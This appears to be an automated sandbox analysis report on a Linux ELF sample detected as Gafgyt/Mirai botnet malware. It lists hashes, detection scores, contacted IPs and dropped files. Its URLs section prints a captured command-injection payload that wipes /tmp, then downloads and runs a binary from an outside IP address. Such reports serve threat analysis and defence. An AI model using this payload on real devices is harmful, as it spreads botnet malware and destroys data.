1xtO9V8ku8

Status: finished
Submission Time: 2022-01-14 23:48:13 +01:00
Malicious
Trojan
Evader
Gafgyt Mirai

Comments

Tags

  • 32
  • elf
  • intel

Details

  • Analysis ID:
    553464
  • API (Web) ID:
    920985
  • Analysis Started:
    2022-01-14 23:55:55 +01:00
  • Analysis Finished:
    2022-01-15 00:04:07 +01:00
  • MD5:
    aac6e25e1d471c889b0ae7b3939e84ed
  • SHA1:
    ed2e1aaf171b7bb4d24c543781f7f831fabe1c61
  • SHA256:
    408362634ac9615317b22bea3be9caba9a1ba70db48ff41a9fdd27b60074612e
  • Technologies:

Joe Sandbox

Detection: malicious
Score: 100
System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

Detection: malicious, Score: 9/42
Detection: malicious, Score: 15/43

IPs

IP              Country  Detection
104.1.204.68    United States
159.91.118.199  United States
59.101.199.215  Australia
176.57.79.198   Russian Federation
93.1.130.80     France
44.118.115.167  United States
149.27.123.191  Kazakhstan
184.2.91.221    United States
53.11.56.88     Germany
171.43.14.219   China
53.220.219.81   Germany
44.196.148.250  United States
5.114.132.141   Iran (Islamic Republic of)
70.140.150.58   United States
40.185.109.192  United States
158.242.12.252  United States
186.186.117.84  Venezuela
178.91.183.200  Kazakhstan
151.249.236.209 Czech Republic
121.30.154.145  China
204.12.98.68    United States
163.87.229.224  France
197.243.99.60   Rwanda
190.133.162.93  Uruguay
174.155.124.236 United States
177.180.254.130 Brazil
223.15.201.231  China
40.58.230.164   United States
131.102.76.251  Switzerland
166.93.1.104    Reserved
157.197.246.126 Korea Republic of
118.240.23.117  Japan
19.11.67.72     United States
82.49.65.53     Italy
41.108.245.6    Algeria
60.248.126.73   Taiwan; Republic of China (ROC)
8.107.28.253    United States
105.189.12.229  Morocco
120.70.150.33   China
207.114.244.32  United States
187.87.170.252  Brazil
181.71.150.144  Colombia
170.187.70.79   United States
209.212.174.247 United States
143.241.129.61  United States
162.30.206.102  United States
75.34.155.11    United States
20.112.77.81    United States
169.248.203.163 United States
119.106.78.235  Japan
48.21.211.95    United States
204.156.187.82  United States
46.56.82.247    Belarus
80.132.5.126    Germany
38.153.88.159   United States
50.138.60.221   United States
104.30.121.98   United States
53.153.108.52   Germany
156.72.230.180  United States
156.228.63.60   Seychelles
71.19.55.97     Canada
20.219.183.2    United States
192.47.110.8    Japan
47.44.9.235     United States
156.49.195.221  Sweden
112.85.175.115  China
44.223.156.7    United States
220.74.4.214    Korea Republic of
108.52.208.147  United States
141.201.89.75   Austria
126.127.82.18   Japan
74.52.52.14     United States
53.152.59.75    Germany
70.150.15.221   United States
110.111.162.22  China
129.17.231.111  United States
32.213.106.159  United States
167.236.98.20   United States
194.16.168.83   Sweden
210.75.10.103   China
176.131.97.133  France
142.154.33.75   Saudi Arabia
95.252.144.225  Italy
168.96.193.109  Argentina
79.118.248.134  Romania
190.45.54.178   Chile
60.11.198.147   China
220.250.160.228 China
209.143.100.57  United States
79.93.200.239   France
2.203.114.164   Germany
14.112.161.254  China
36.28.252.139   China
45.130.62.153   Israel
32.173.232.222  United States
184.89.111.3    United States
58.110.34.63    Australia
166.87.120.234  Saudi Arabia
67.164.149.29   United States
62.167.11.173   Switzerland

URLs

Name Detection
http://upx.sf.net
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name  File Type  Hashes  Detection
/var/cache/man/sr/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ko/index.db.CHkWlX  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/nl/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/nl/index.db.GufyBY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pl/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pl/index.db.a5HjTW  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pt/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pt/index.db.L3jLjW  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pt_BR/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/pt_BR/index.db.oojnzZ  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ru/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ru/index.db.AC78mY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/sl/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/sl/index.db.pkc8DW  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ko/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/sr/index.db.S5MaDX  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/sv/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/sv/index.db.NVNacY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/tr/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/tr/index.db.OMgcpY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/zh_CN/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/zh_CN/index.db.zJimoZ  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/zh_TW/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/zh_TW/index.db.jpfpKZ  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/lib/logrotate/status.tmp  ASCII text
/var/log/cups/access_log.1.gz  gzip compressed data, last modified: Fri Jan 14 22:56:00 2022, from Unix
/var/log/syslog.1.gz  gzip compressed data, last modified: Fri Jan 14 22:56:01 2022, from Unix
/var/cache/man/fr.UTF-8/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/cs/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/cs/index.db.OidWsZ  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/da/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/da/index.db.Tx9djV  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/de/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/de/index.db.QeAR9Y  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/es/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/es/index.db.7BpmSY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fi/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fi/index.db.UDmH4W  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fr.ISO8859-1/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fr.ISO8859-1/index.db.93HFlX  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fr.UTF-8/index.db.1j2FZY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fr/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/fr/index.db.kCK1BY  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/hu/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/hu/index.db.oktA6X  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/id/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/id/index.db.Yrsi7X  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/index.db.C1CCCV  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/it/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/it/index.db.Oz0gYV  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ja/5419  GNU dbm 1.x or ndbm database, little endian, 64-bit
/var/cache/man/ja/index.db.XKudCZ  GNU dbm 1.x or ndbm database, little endian, 64-bit